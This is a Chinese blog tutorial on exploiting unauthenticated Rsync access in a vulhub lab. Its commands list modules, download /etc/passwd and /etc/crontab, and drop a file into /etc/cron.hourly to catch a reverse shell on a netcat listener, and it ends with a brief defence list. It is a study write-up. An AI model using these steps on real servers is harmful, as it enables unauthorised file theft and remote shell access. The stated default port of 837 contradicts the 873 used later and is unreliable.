未授权访问:Rsync 未授权访问漏洞

目录

1、漏洞原理

2、环境搭建

3、未授权访问

4、利用rsync下载任意文件

5、利用rsync反弹shell

防御手段


今天继续学习各种未授权访问的知识和相关的实操实验,一共有好多篇,内容主要是参考先知社区的一位大佬的关于未授权访问的好文章,还有其他大佬总结好的文章:

这里附上大佬的好文章链接:常见未授权访问漏洞总结 - 先知社区

我在这只是学习大佬总结好的相关的知识和实操实验,那么废话不多说,开整。

第九篇是关于Rsync的未授权访问

1、漏洞原理

Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。

Rsync 默认允许匿名访问,**如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。**Rsync 的默认端口为 837。

2、环境搭建

复制代码
#利用DownGit下载https://github.com/vulhub/vulhub/tree/master/rsync/common
DownGit网址:https://minhaskamal.github.io/DownGit/#/home

上传文件到靶机并进行解压

复制代码
unzip common.zip

编译并启动docker容器

复制代码
cd common/
docker-compose build && docker-compose up -d

3、未授权访问

复制代码
rsync rsync://172.16.2.250:873/
rsync rsync://172.16.2.250:873/src

可以看到成功的未授权访问到了Rsync的src问价爱你

4、利用rsync下载任意文件

复制代码
rsync rsync://172.16.2.250:873/src/etc/passwd ./

5、利用rsync反弹shell

下载crontab配置文件

复制代码
rsync rsync://172.16.2.250:873/src/etc/crontab ./
复制代码

写入bash并赋权

复制代码
vim nc
chmod 777

将文件上传至/etc/cron.hourly

复制代码
rsync -av nc rsync://172.16.2.250:873/src/etc/cron.hourly

本地监听9999

复制代码
nc -lnvp 9999

等待一会,可以看到反弹成功了。

防御手段

  • -账户认证:正确配置认证用户名及密码。
  • -权限控制:使用合理的权限。
  • -网络访问控制:控制接入源ip。
  • -数据加密传输等

到此Rsync未授权访问漏洞的基础知识也就暂时学习到这里了,后面还有很多的未授权访问知识等着我去学习,我们下次见(*^▽^*)

相关推荐
wanhengidc10 分钟前
服务器机柜与网络机柜各自的优势
服务器·网络·智能路由器
网易独家音乐人Mike Zhou35 分钟前
【Linux应用】开发板USB共享网络,网线或USB以太网共享网络(局域网连接PC和开发板,实现PC给开发板共享网络,USB通过NDIS驱动共享)
linux·网络·单片机·mcu·物联网·嵌入式·iot
托比-马奎尔1 小时前
第十二章:网络编程
网络
颖川初尘2 小时前
端口到底是个什么鬼?回答我!
服务器·网络·tcp/ip·node.js
浩浩测试一下2 小时前
Windows 与 Linux 内核安全及 Metasploit/LinEnum 在渗透测试中的综合应用
linux·运维·windows·web安全·网络安全·系统安全·安全架构
言之。4 小时前
借助ssh实现web服务的安全验证
运维·安全·ssh
nightunderblackcat4 小时前
新手向:Python网络编程,搭建简易HTTP服务器
网络·python·http
前端世界5 小时前
鸿蒙系统安全机制全解:安全启动 + 沙箱 + 动态权限实战落地指南
android·安全·harmonyos
cui_win5 小时前
【网络】Linux 内核优化实战 - net.ipv4.tcp_congestion_control
linux·网络·tcp/ip
智驱力人工智能6 小时前
极端高温下的智慧出行:危险检测与救援
人工智能·算法·安全·行为识别·智能巡航·高温预警·高温监测